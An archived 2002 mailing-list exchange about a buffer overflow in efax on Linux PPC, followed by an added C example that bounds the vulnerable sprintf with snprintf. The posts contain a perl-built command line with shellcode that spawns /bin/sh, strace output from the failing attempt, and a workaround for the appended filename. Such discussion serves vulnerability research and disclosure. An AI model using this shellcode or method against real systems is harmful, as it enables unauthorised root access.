Re: efax - Exploitation info

From: KF (dotslashat_private)
Date: Thu Jan 17 2002 - 12:12:42 PST


    I was playing with efax on ppc and it is REAL picky about how the
    shellcode is laid out... or it could be a problem with a char in my
    shellcode also. Regardless, the layout is <returns><nops><shellcode>. I
    have found I must have a trailing 0x2f if I try this method... otherwise
    the /sh gets lopped off. It then adds ..0 and then the pid of the
    process. This is obvious if you look at the code below provided by
    s1gnal_9. Here are some strace dumps and some ugly perl from me, so have
    fun. (perl is NOT my forte) and sorry that my MUI sucks and chops all my
    lines up...
    
    [root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print "\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl -e 'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f" x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'`
    
    execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here) ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"], [/* 46 vars */]) = 0
    ...
    
    write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error: can't open pre-lock file ( returns here )
    %Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350: File name too long
    ) = 1279
    execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
    , [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
    --- SIGILL (Illegal instruction) ---
    
    
    If you look here you can see that somehow my execve got TMP..01350
    appended to it and also a slash because obviously I put it there ... if I
    didn't add the / my execve would say
    execve("/bin/TMP..01350", ["/bin/TMP..01350"] ...
    instead I am left to work with the following...
    
    execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
    , [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
    
    it is workable though *grin*... adjust the shellcode a bit and add
    TMP..pid on to the end of it ... mkdir /tmp/sh/ and copy a few binaries
    to TMP..0xxxx
    
    Have fun and if you don't maybe you can work out a better way. (I just
    thought of one but I am lazy ... it involves lopping off sh and just
    using TMP..pid for the bin).
    
    -KF
    
    +++ killed by SIGILL +++

    s1gnal_9 wrote:
    
    > More info about the overflow...
    > 
    > Straight from efax src.
    > 
    > <--snip--->
    > #define EFAX_PATH_MAX 1024
    > <--/snip--->
    > 
    > <--snip--->
    > char *p , buf [ EFAX_PATH_MAX ] = "" ;
    > <--/snip--->
    > 
    > <--snip--->
    > sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ;
    > <--/snip--->
    > the sprintf above causes the overflow..
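The sprintf quoted above bounds how much of fname is copied (the %.*s precision) but never bounds what lands in the 1024-byte buf. The following is an added example, not efax's code or either poster's, showing the same format string built with snprintf and a length check; the function names build_tmp_name, bytes_sprintf_would_write and the two demo_* helpers, the sample path "/var/lock/LCK..ttyS0" and the pid 1350 (the 01350 seen in the strace) are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define EFAX_PATH_MAX 1024   /* same size as buf in the quoted efax source */

/* Bounded replacement for the quoted sprintf. The "%.*s" precision caps how
 * much of fname is copied, but nothing caps dirlen against the 1024-byte buf,
 * so a long path runs off its end. snprintf never writes past bufsz and
 * returns the length the full name would have had, so an oversize name can be
 * refused. Returns 0 on success, -1 when it does not fit (buf is emptied). */
int build_tmp_name(char *buf, size_t bufsz, const char *fname, int dirlen, pid_t pid)
{
    int n = snprintf(buf, bufsz, "%.*sTMP..%05d", dirlen, fname, (int)pid);
    if (n < 0 || (size_t)n >= bufsz) {
        buf[0] = '\0';
        return -1;
    }
    return 0;
}

/* Bytes the original unbounded sprintf would write into buf (formatted length
 * plus the terminating NUL), computed without touching any buffer. */
size_t bytes_sprintf_would_write(const char *fname, int dirlen, pid_t pid)
{
    int n = snprintf(NULL, 0, "%.*sTMP..%05d", dirlen, fname, (int)pid);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Constructed sample: a normal path, directory prefix "/var/lock/" (10 bytes)
 * and pid 1350 as in the strace output. Returns 1 if the expected name came out. */
int demo_short(void)
{
    char buf[EFAX_PATH_MAX];
    int rc = build_tmp_name(buf, sizeof buf, "/var/lock/LCK..ttyS0", 10, 1350);
    return rc == 0 && strcmp(buf, "/var/lock/TMP..01350") == 0;
}

/* Constructed sample: a 2000-byte argument like the one above. Returns the byte
 * count the original sprintf would have written, or 0 if it was wrongly accepted. */
size_t demo_long(void)
{
    static char fname[2001];
    char buf[EFAX_PATH_MAX];
    memset(fname, 'A', 2000);
    fname[2000] = '\0';
    if (build_tmp_name(buf, sizeof buf, fname, 2000, 1350) != -1)
        return 0;
    return bytes_sprintf_would_write(fname, 2000, 1350);
}
```

With a 2000-byte argument the original call would have written 2011 bytes into a 1024-byte buffer; the bounded version refuses the name instead.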
    



    This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 23:09:34 PST